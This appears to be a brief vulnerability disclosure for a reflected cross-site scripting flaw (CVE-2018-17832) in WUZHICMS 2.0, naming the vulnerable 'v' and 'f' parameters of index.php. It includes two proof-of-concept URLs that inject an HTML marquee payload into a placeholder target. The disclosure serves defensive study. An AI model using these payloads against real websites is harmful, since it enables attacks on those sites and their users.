WUZHICMS version 2.0 suffers from a cross site scripting vulnerability.
8585ecedfca49c937d1f1d111a80fb580399dd1606d4c5e59662886f307d2809
# Title: WUZHICMS 2.0 - Cross-Site Scripting
# Author: Felipe "Renzi" Gabriel
# Date: 2018-10-01
# Vendor: https://www.wuzhicms.com
# Software: WUZHICMS 2.0
# CVE: CVE-2018-17832
# Technical Details & Description:
# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0 web-application.
# The vulnerability is located in the 'v' and 'f' parameters of the`index.php` action GET method request.
# PoC
https://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>
https://Target/index.php?f="><marquee><h1>RENZI</h1></marquee>
# Reference
https://cxsecurity.com/issue/WLB-2018050139